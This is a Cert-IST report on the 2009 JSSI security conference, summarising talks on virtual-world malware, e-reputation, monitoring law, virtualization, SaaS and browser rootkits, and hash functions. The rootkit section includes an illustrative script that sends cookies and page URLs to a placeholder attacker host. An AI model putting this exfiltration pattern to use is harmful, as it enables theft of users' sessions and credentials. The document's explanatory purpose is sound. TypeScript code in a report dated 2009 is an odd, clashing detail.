Report on the 2009 JSSI meeting

Date: April 03, 2009

The 2009 JSSI meeting ("Journée de la Sécurité des Systèmes d'Information", organized by the OSSIR association) was held on March 17th, 2009 in Paris. The Cert-IST attended the conference, which gathered hundreds of participants. The presentations focused on the theme "The new faces of computer insecurity" and covered a wide range of topics, including SAAS (Software As A Service) security solutions, reputation management in an open and communicating Web 2.0 environment, and the security of virtual worlds.

The talks were in-depth and kept up the pace all day long, which made the day very interesting and worthwhile.

This report does not present the technical details of each presentation; it focuses on the major ideas of interest for the Cert-IST community. The presentation materials are available on the official JSSI 2009 website.

 

Malware on Second Life: myth or reality? (F. Paget - McAfee)

Mr F. Paget had already given a presentation about the security of virtual worlds at the 2008 EICAR conference. This time, he investigated whether it is possible to implement in virtual worlds the same kinds of malware we already know in "real life".

As expected, the answer is "yes", and several demonstration programs were presented to illustrate it:

  • The spammer glass: This is a virtual object that looks like a glass and which, if picked up by an avatar (a character representing a user in the virtual world), begins to send spam emails into the real world. It is therefore an example of a Trojan designed for virtual worlds (a fake virtual object) that carries a nuisance (spam) interacting with the real world.
  • The worm: To demonstrate the possibility of self-replicating code in a virtual world, he developed a virtual object which instantly self-replicates when touched by an avatar (a conceptual sketch is given after this list).
  • The virus: It is also possible to design malicious objects that attempt to infect other objects in the virtual world. The presenter's experiments on this topic concluded that it is currently not possible to build a fully autonomous virus: the (unintentional) collaboration of an avatar (who manipulates the infected object) is required to propagate the infection.
  • Theft and phishing: The last prototype presented showed that it would be possible to build a Trojan that steals the virtual money carried by an avatar. A phishing-like scenario was set up to convince the avatar to use this Trojan.
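
To make the worm mechanic more concrete, here is a conceptual sketch. The real prototype is written in LSL (Second Life's scripting language), where a touch_start() event handler can call llRezObject() to spawn a copy of the object in-world; the TypeScript model below only mimics that structure and is purely illustrative.

    // Conceptual model of the self-replicating virtual object: every
    // touch by an avatar spawns a new copy carrying the same behaviour.
    // In the real prototype this logic lives in an LSL script, where
    // touch_start() reacts to the avatar and llRezObject() rezzes the copy.
    class SelfReplicatingObject {
      constructor(private world: SelfReplicatingObject[]) {}

      // Stand-in for the LSL touch_start() event handler.
      onTouch(): void {
        // Stand-in for llRezObject(): a new copy appears in the world.
        this.world.push(new SelfReplicatingObject(this.world));
      }
    }

    // One object is dropped in the world; each touch adds one copy,
    // so the population grows with every avatar interaction.
    const world: SelfReplicatingObject[] = [];
    world.push(new SelfReplicatingObject(world));
    world[0].onTouch();
    world[1].onTouch();
    console.log(world.length); // 3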

Overall, this research shows that virtual worlds are not immune to the malware threats we already know in the real world.

 

The challenges of e-reputation (S. Koch - Intelligentzia.net)

Companies have always had to pay careful attention to preserving their image (reputation) and to preventing leaks that may affect their informational assets.

But the increasing usage of the Web 2.0 world and the profusion of knowledge-sharing tools (forums, blogs and social networks) significantly increase these risks. These tools are widely present on the Internet and are used by a growing number of employees. By posting a message on a blog or a forum, an employee may harm the reputation of the company or disclose sensitive information.

The speaker highlighted the opposition between the "closed" world (the de facto model for a company) and the "open and free" world (the "Internet-like" model). When browsing the Internet, employees are immersed in a totally different environment and may adopt behaviours that are totally irrational compared with the rules implied by their company's code of conduct.

Koch gave many examples of the risks induced by Web 2.0 Internet environments ("profiling", disinformation, etc.). He mentioned that Internet users:

  • Often behave as consumers rather than as rational and wise persons. To access what they want, consumers are ready to accept terms which seem totally unreasonable to a rational person (e.g. the Facebook terms of use, which required users to surrender to Facebook the ownership rights over anything they publish there).
  • Do not realize that their publications can reach a large audience, and that once published the information can no longer be controlled.

Rather than prohibiting the use of these tools, the speaker recommends promoting awareness and educating employees on the proper usage of the Web 2.0 tools.

 

Data communication filtering and monitoring: Yes we can!

This presentation aimed at answering the question: is it legal for a company to filter and log communication data?

The presenter first described the French laws related to IT activities and showed that they provide no concrete answer to this question. For example, the LCEN law (Loi pour la Confiance dans l'Economie Numérique) was published in 2004, but we are still waiting for the decrees that will define the concrete measures to be enforced.

Despite this legal limbo, the speaker explained that it is very important for companies to filter and log, because not doing so would be considered negligence. He therefore recommended writing the "Acceptable Use Policy" and the monitoring and filtering rules into an internal charter. It is important that the charter stays in line with current technologies and covers issues such as user mobility and Web 2.0. He developed (and promoted) a model for such charters, which he calls a "4G charter" because it covers four axes (refer to the presentation material for further details).

While these matters are not entirely new and have already been covered (e.g. see the presentation [2] mentioned in the Cert-IST report for JSSI 2007), it is interesting to note that:

  • The speech is now very clear: "A company MUST apply filtering and logging on data communication".
  • There are now new concerns to take into account, such as evidence preservation (what steps must be taken to ensure the integrity of the evidence collected).

 

Virtualization and Security (N. Ruff - EADS)

The presentation focused on the security of VMware environments because, according to a study published by Forrester in 2009, VMware is the leader of the virtualization market segment (98% market share), far ahead of Microsoft and Citrix/Xen. It is also the most mature environment in terms of stability and reliability. The speaker presented an analysis covering all the categories of vulnerabilities that can be found in virtualized environments. We only report here the facts we found most significant.

 

The major risk is environmental

The major source of problems when migrating to a virtualized environment is not the computer itself but the production environment:

  • The existing monitoring tools could fail when addressing virtualized computers.
  • The existing procedures (backups, recovery plans, etc.) could require adjustments.
  • The administrator of the server hosting the virtualized systems becomes a super-user who controls all of these servers.

Note: The speaker qualified these as "human risks", but we have adopted the term "environmental risks", which has a broader meaning.

This environmental aspect is very important and should not be overlooked. Several guides exist to help take these aspects into account when migrating to a virtualized environment (e.g. the NIST guides or the VMware training courses).

 

Virtualization introduces a critical resource: the host system

When many servers are virtualized on a single host system, this host system becomes a critical resource. Any downtime of the host system impacts all the virtualized hosts. Any change made to the host system (e.g. applying a security patch) becomes a risky operation.

 

The security level of a virtualized environment is always lower than that of the equivalent real systems

From a theoretical point of view, a virtualized environment introduces an additional layer in the IT architecture: the host system that runs the virtualized servers. This layer brings potential vulnerabilities which increase the security exposure of the virtualized environment. This reasoning shows that a virtualized architecture cannot be more secure than the equivalent real systems.

 

Security of ASP / SAAS platforms (Y. Allain - Opale-securite.com)

This presentation evaluated the security of SAAS ("Software As A Service", also known as ASP: Application Service Provider) platforms. The principle of a SAAS solution is that the service is not implemented by a piece of software sold to the company: it is accessed through a web interface on the supplier's website.

The speaker explained that the level of security for SAAS solutions is often not high enough.

But he also thinks that SAAS solutions provide a real advantage for companies in some business sectors. He gave as examples accounts management for multinational companies and sales force management. Rejecting SAAS because of its security weaknesses is thus probably not appropriate.

Based on his experience evaluating SAAS security, the speaker made the following recommendations:

  • Be pragmatic.
  • Work transparently with the SAAS provider.
  • Include legal clauses in SAAS contracts.
  • Perform penetration testing.

 

Two thirds of the SAAS applications assessed had significant security weaknesses. In particular:

  • The security features provided are often weak. For example, access control is commonly achieved with a simple login/password mechanism. This authentication method is very weak compared with the mechanisms usually put in place for remote access to corporate resources (e.g. strong token-based authentication for VPN access).
  • A significant proportion of SAAS suppliers have low maturity in the area of IT security.
  • Most of the suppliers' security effort goes into buying infrastructure equipment dedicated to security (e.g. firewalls). On the other hand, big security issues were found during tests of some of the web applications used by SAAS solutions. Spending less money on hardware and more on application security would greatly benefit SAAS security.

 

Web browser rootkits (C. Devaux and J. Lenoir – Sogeti)

Note: This talk had already been presented at the Hack.Lu 2008 and Microsoft TechDays 2009 conferences.

This is a presentation of a study done by the Sogeti ESEC Research Division. The aim of the study was to investigate the possibility of inserting a rootkit into a web browser. Two prototypes were developed as demonstrations:

  • A rootkit for Firefox. It is a malicious Firefox extension (an "xpi" file) that the user inadvertently installs (social engineering attack). This extension is invisible, uses the primitives available in Firefox (XPCOM) to steal passwords and cookies, and communicates with the Internet via standard JavaScript primitives (XMLHttpRequest); a minimal sketch of this exfiltration pattern is given below, after the note. This rootkit highlights a major flaw in Firefox extensions: no mechanism exists to limit the actions that a malicious extension can perform. Note: In 2006, the Cert-IST published an article about the dangers induced by Firefox extensions.
  • A rootkit for Internet Explorer. The rootkit uses already-known techniques to inject itself into the Internet Explorer process. This means that the rootkit is not a BHO (Browser Helper Object): it runs by patching the core IE process. The BHO approach was analysed as a possible way to implement a rootkit, but was finally discarded (see the presentation material for further details). One interesting aspect of this rootkit is that it creates a hidden tab in Internet Explorer and corrupts IE internal caches to increase the privileges granted to this hidden tab. Once this is achieved, the tab is used to easily implement the various features of the rootkit.

Note: The demonstration of the IE rootkit was performed on Windows XP, not on Vista (which has additional security features such as the "protected mode").
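
To make the Firefox exfiltration channel more concrete, here is a minimal TypeScript sketch of the pattern. It assumes the extension has already collected its data through XPCOM interfaces, as the prototype does; the exfiltrate() function name and the server URL are placeholders of ours, not the presenters' actual code.

    // Minimal sketch of the exfiltration pattern: once a malicious
    // extension has gathered data (via XPCOM in the real prototype),
    // it can ship it out with the same XMLHttpRequest primitive any
    // web page uses, so the traffic blends in with ordinary HTTP.
    // The URL below is a placeholder for an attacker-controlled server.
    function exfiltrate(stolenData: Record<string, string>): void {
      const xhr = new XMLHttpRequest();
      xhr.open("POST", "https://attacker.example/collect", true);
      xhr.setRequestHeader("Content-Type", "application/json");
      xhr.send(JSON.stringify(stolenData));
    }

    // Example call: cookies readable from the current page context.
    exfiltrate({ cookies: document.cookie, page: location.href });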

 

Hash functions, a fashionable subject (T. Peyrin - ingenico.com)

This presentation explained hash functions in detail (from the old MD4 to the upcoming SHA-3) and gave a history of their vulnerabilities.

The speaker first explained that all these algorithms are based on a common architecture. This could explain why these algorithms have been "broken" (at least in theory) one after the other since 2004 (refer to the article "Cryptographic weaknesses in MD5 and SHA-1" published by the Cert-IST in August 2004).
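
The common architecture in question is the Merkle-Damgård construction: the message is padded, split into fixed-size blocks, and each block is folded into a chaining state by a compression function, so a weakness in the compression function affects the whole family. Here is a toy TypeScript sketch of that iteration structure; the compression function is a deliberately trivial mix of ours, not any real one.

    // Toy Merkle-Damgård construction. Real designs (MD5, SHA-1, SHA-2)
    // use 64-byte blocks, a larger state and a strong compression
    // function; only the chaining structure is faithful here.
    const BLOCK_SIZE = 8; // bytes per block (real functions use 64)

    // Trivial compression function: folds one block into a 32-bit state.
    function compress(state: number, block: Uint8Array): number {
      let h = state;
      for (const byte of block) {
        h = ((h << 5) - h + byte) >>> 0; // h = h * 31 + byte (mod 2^32)
      }
      return h;
    }

    // Merkle-Damgård padding: append 0x80, zeros, then the message
    // length (here the byte length on 32 bits; real designs encode
    // the bit length on 64 bits).
    function pad(msg: Uint8Array): Uint8Array {
      const total = Math.ceil((msg.length + 1 + 4) / BLOCK_SIZE) * BLOCK_SIZE;
      const out = new Uint8Array(total);
      out.set(msg);
      out[msg.length] = 0x80;
      new DataView(out.buffer).setUint32(total - 4, msg.length);
      return out;
    }

    function toyHash(msg: Uint8Array): number {
      let state = 0x67452301; // fixed IV, as in the real designs
      const padded = pad(msg);
      for (let i = 0; i < padded.length; i += BLOCK_SIZE) {
        state = compress(state, padded.subarray(i, i + BLOCK_SIZE));
      }
      return state >>> 0;
    }

    console.log(toyHash(new TextEncoder().encode("abc")).toString(16));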

The MD5 weakness was first spotted in 1993, but it took until 2004 (and the publication of results by Chinese researchers) for a real MD5 collision to be exhibited. It is now possible to create MD5, SHA-0 and SHA-1 collisions with limited computing power. And although SHA-2 collisions have not yet been found, the search algorithms now available will probably "break" this algorithm within the next three years. A contest has been launched by the US NIST to select a new algorithm to replace SHA-2. This new algorithm will be named SHA-3 and should be operational in 2012.

Finally, the speaker commented on the recent attacks against MD5-based digital certificates (see our VulnCoord-2008.040 message published in December 2008). These attacks bring nothing new from a cryptographic point of view, but they show once again that the MD5 algorithm is now far too weak.

 
